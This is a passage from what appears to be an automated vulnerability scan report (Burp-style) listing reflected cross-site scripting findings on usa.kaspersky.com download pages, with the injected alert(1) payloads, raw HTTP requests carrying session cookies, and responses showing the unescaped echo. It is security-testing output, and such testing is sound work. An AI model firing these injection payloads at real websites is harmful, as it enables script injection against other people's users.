Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:33:03 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686383"
Content-Type: text/html; charset=utf-8
Content-Length: 30301
Date: Sat, 18 Dec 2010 15:33:09 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads2c29b"><script>alert(1)</script>b59c5579f7/product-downloads/mobile-security" />
...[SNIP]...

1.102. http://usa.kaspersky.com/downloads/product-downloads/mobile-security [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/mobile-security

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c955a"-alert(1)-"33b8fb8aac5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloadsc955a"-alert(1)-"33b8fb8aac5/product-downloads/mobile-security HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:33:22 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686402"
Content-Type: text/html; charset=utf-8
Content-Length: 30210
Date: Sat, 18 Dec 2010 15:33:28 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloadsc955a"-alert(1)-"33b8fb8aac5/product-downloads/mobile-security";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.103. http://usa.kaspersky.com/downloads/product-downloads/mobile-security [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/mobile-security

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2b6b"><script>alert(1)</script>1a1f7428287 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/product-downloadsd2b6b"><script>alert(1)</script>1a1f7428287/mobile-security HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:35:09 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686509"
Content-Type: text/html; charset=utf-8
Content-Length: 30433
Date: Sat, 18 Dec 2010 15:35:18 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/product-downloadsd2b6b"><script>alert(1)</script>1a1f7428287/mobile-security" />
...[SNIP]...

1.104. http://usa.kaspersky.com/downloads/product-downloads/mobile-security [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/mobile-security

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 718df"-alert(1)-"8373e52726b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads/product-downloads718df"-alert(1)-"8373e52726b/mobile-security HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:35:32 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686532"
Content-Type: text/html; charset=utf-8
Content-Length: 30336
Date: Sat, 18 Dec 2010 15:35:38 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
hank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads/product-downloads718df"-alert(1)-"8373e52726b/mobile-security";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.105. http://usa.kaspersky.com/downloads/product-downloads/mobile-security [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/mobile-security

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6810f"><script>alert(1)</script>44544323536 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/product-downloads/mobile-security6810f"><script>alert(1)</script>44544323536 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:37:25 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686645"
Content-Type: text/html; charset=utf-8
Content-Length: 30433
Date: Sat, 18 Dec 2010 15:37:32 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/product-downloads/mobile-security6810f"><script>alert(1)</script>44544323536" />
...[SNIP]...

1.106. http://usa.kaspersky.com/downloads/product-downloads/mobile-security [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/mobile-security

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4a6e"-alert(1)-"82d4a23c03c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads/product-downloads/mobile-securityc4a6e"-alert(1)-"82d4a23c03c HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:37:47 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686667"
Content-Type: text/html; charset=utf-8
Content-Length: 30336
Date: Sat, 18 Dec 2010 15:37:54 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
ageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads/product-downloads/mobile-securityc4a6e"-alert(1)-"82d4a23c03c";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.107. http://usa.kaspersky.com/downloads/product-downloads/mobile-security [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/mobile-security

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d03e"><script>alert(1)</script>d694426d1ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/product-downloads/mobile-security?4d03e"><script>alert(1)</script>d694426d1ae=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:30:18 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686218"
Content-Type: text/html; charset=utf-8
Content-Length: 32492
Date: Sat, 18 Dec 2010 15:30:30 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/product-downloads/mobile-security?4d03e"><script>alert(1)</script>d694426d1ae=1" />
...[SNIP]...

1.108. http://usa.kaspersky.com/downloads/product-downloads/password-manager [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/password-manager

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e677"><script>alert(1)</script>b7289ca57e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads9e677"><script>alert(1)</script>b7289ca57e5/product-downloads/password-manager HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:34:11 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686451"
Content-Type: text/html; charset=utf-8
Content-Length: 30313
Date: Sat, 18 Dec 2010 15:34:18 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads9e677"><script>alert(1)</script>b7289ca57e5/product-downloads/password-manager" />
...[SNIP]...

1.109. http://usa.kaspersky.com/downloads/product-downloads/password-manager [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/password-manager

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ff99"-alert(1)-"bc04232033c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads4ff99"-alert(1)-"bc04232033c/product-downloads/password-manager HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:34:29 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686469"
Content-Type: text/html; charset=utf-8
Content-Length: 30216
Date: Sat, 18 Dec 2010 15:34:34 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads4ff99"-alert(1)-"bc04232033c/product-downloads/password-manager";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.110. http://usa.kaspersky.com/downloads/product-downloads/password-manager [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/password-manager

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdb49"><script>alert(1)</script>fc7238cc401 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/product-downloadsbdb49"><script>alert(1)</script>fc7238cc401/password-manager HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:36:31 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686591"
Content-Type: text/html; charset=utf-8
Content-Length: 30439
Date: Sat, 18 Dec 2010 15:36:36 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/product-downloadsbdb49"><script>alert(1)</script>fc7238cc401/password-manager" />
...[SNIP]...

1.111. http://usa.kaspersky.com/downloads/product-downloads/password-manager [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/password-manager

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f382"-alert(1)-"0f5a04be621 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads/product-downloads3f382"-alert(1)-"0f5a04be621/password-manager HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:36:49 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686609"
Content-Type: text/html; charset=utf-8
Content-Length: 30342
Date: Sat, 18 Dec 2010 15:36:58 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
hank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads/product-downloads3f382"-alert(1)-"0f5a04be621/password-manager";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.112. http://usa.kaspersky.com/downloads/product-downloads/password-manager [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/password-manager

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1c55"><script>alert(1)</script>7616b34fc3c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/product-downloads/password-managere1c55"><script>alert(1)</script>7616b34fc3c HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:38:37 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686717"
Content-Type: text/html; charset=utf-8
Content-Length: 30439
Date: Sat, 18 Dec 2010 15:38:42 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/product-downloads/password-managere1c55"><script>alert(1)</script>7616b34fc3c" />
...[SNIP]...

1.113. http://usa.kaspersky.com/downloads/product-downloads/password-manager [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/password-manager

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34cb3</script><script>alert(1)</script>25992fd501 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads/product-downloads/password-manager34cb3</script><script>alert(1)</script>25992fd501 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:39:32 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686772"
Content-Type: text/html; charset=utf-8
Content-Length: 30473
Date: Sat, 18 Dec 2010 15:39:37 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
geName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads/product-downloads/password-manager34cb3</script><script>alert(1)</script>25992fd501";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.114. http://usa.kaspersky.com/downloads/product-downloads/password-manager [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-downloads/password-manager

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa4b6"><script>alert(1)</script>847f16d6988 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/product-downloads/password-manager?fa4b6"><script>alert(1)</script>847f16d6988=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
